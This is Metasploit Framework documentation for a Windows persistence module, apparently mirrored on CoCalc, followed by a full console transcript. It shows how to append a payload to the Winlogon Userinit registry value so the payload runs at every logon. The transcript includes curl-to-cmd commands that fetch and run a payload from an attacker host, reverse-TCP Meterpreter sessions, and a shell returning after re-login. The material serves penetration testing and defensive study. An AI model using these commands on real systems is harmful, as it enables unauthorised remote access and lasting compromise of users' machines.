Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/persistence/registry_userinit.md
36042 views

Vulnerable Application

This module will install a payload that is executed during user logon. It writes a payload executable to disk and modifies the Userinit registry value in "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" to append the payload path, causing it to execute when any user logs in.

Verification Steps

  1. Start msfconsole

  2. Obtain an administrator level meterpreter on Windows

  3. Do: use modules/exploits/windows/persistence/registry_userinit

  4. Do: set session #

  5. Do: run

  6. On next user login, You should get a shell.

Options

PAYLOAD_NAME

Name of payload file to write. Random string as default.

Scenarios

Windows 10 1909 (10.0 Build 18363)

Initial admin shell

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe

[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450 
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49747) at 2026-01-03 16:20:11 -0500

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...

Install persistence

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/registry_userinit 
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/registry_userinit) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/registry_userinit) > set session 1
session => 1
msf exploit(windows/persistence/registry_userinit) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4444 
msf exploit(windows/persistence/registry_userinit) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Registry likely exploitable
[+] Writing payload to C:\Users\windows\AppData\Local\Temp\UASEQXKrCsOUN.exe
[*] Updating 'C:\Windows\system32\userinit.exe,' to 'C:\Windows\system32\userinit.exe,C:\Users\windows\AppData\Local\Temp\UASEQXKrCsOUN.exe'
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260103.2052/WIN10PROLICENSE_20260103.2052.rc

Logout, and log back in to trigger payload execution

[*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49749) at 2026-01-03 16:21:15 -0500

msf exploit(windows/persistence/registry_userinit) >